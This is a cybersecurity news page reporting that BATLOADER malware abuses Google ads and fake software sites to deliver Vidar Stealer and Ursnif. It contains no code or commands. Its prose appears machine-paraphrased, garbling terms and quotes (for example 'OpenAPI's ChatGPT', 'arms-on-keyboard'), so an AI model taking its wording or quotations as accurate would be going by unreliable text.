• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
batloader malware uses google ads to deliver vidar stealer and

BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads

You are here: Home / General Cyber Security News / BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads
March 11, 2023

The malware downloader recognised as BATLOADER has been observed abusing Google Advertisements to supply secondary payloads like Vidar Stealer and Ursnif.

According to cybersecurity company eSentire, destructive ads are utilised to spoof a extensive array of legit applications and products and services this sort of as Adobe, OpenAPI’s ChatGPT, Spotify, Tableau, and Zoom.

BATLOADER, as the identify indicates, is a loader that’s dependable for distributing following-stage malware this kind of as information stealers, banking malware, Cobalt Strike, and even ransomware.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


One particular of the important qualities of the BATLOADER operations is the use of application impersonation strategies for malware shipping.

This is realized by setting up lookalike internet websites that host Windows installer documents masquerading as legit applications to bring about the infection sequence when a consumer browsing for the computer software clicks a rogue advertisement on the Google lookup benefits web site.

Vidar Stealer and Ursnif Payloads

These MSI installer data files, when released, execute Python scripts that comprise the BATLOADER payload to retrieve the subsequent-stage malware from a distant server.

This modus operandi marks a slight change from the earlier attack chains noticed in December 2022, when the MSI installer deals had been utilised to operate PowerShell scripts to obtain the stealer malware.

WEBINARDiscover the Concealed Hazards of Third-Party SaaS Apps

Are you conscious of the challenges related with third-party app accessibility to your firm’s SaaS apps? Join our webinar to find out about the sorts of permissions staying granted and how to limit risk.

RESERVE YOUR SEAT

Other BATLOADER samples analyzed by eSentire have also revealed extra abilities that allow the malware to create entrenched access to company networks.

“BATLOADER proceeds to see improvements and improvement given that it initial emerged in 2022,” eSentire claimed.

“BATLOADER targets various well known purposes for impersonation. This is no incident, as these programs are usually discovered in organization networks and hence, they would produce far more beneficial footholds for monetization by using fraud or arms-on-keyboard intrusions.”

Observed this report intriguing? Abide by us on Twitter  and LinkedIn to read extra special content we article.


Some areas of this short article are sourced from:
thehackernews.com

Previous Post: «Cyber Security News Hadoken Security Group Upgrades Xenomorph Mobile Malware
Next Post: KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets kamikakabot malware used in latest dark pink apt attacks on»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data
  • Some GitHub users must take action after RSA SSH host key exposed
  • THN Webinar: Inside the High Risk of 3rd-Party SaaS Apps
  • Pension Protection Fund confirms employee data exposed in GoAnywhere breach
  • GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations
  • Now UK Parliament Bans TikTok from its Network and Devices
  • IRS Phishing Emails Used to Distribute Emotet
  • Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies
  • Fifth of Execs Admit Security Flaws Cost Them New Biz
  • Online Safety Bill: Why is Ofcom being thrown under the bus?

Copyright © TheCyberSecurity.News, All Rights Reserved.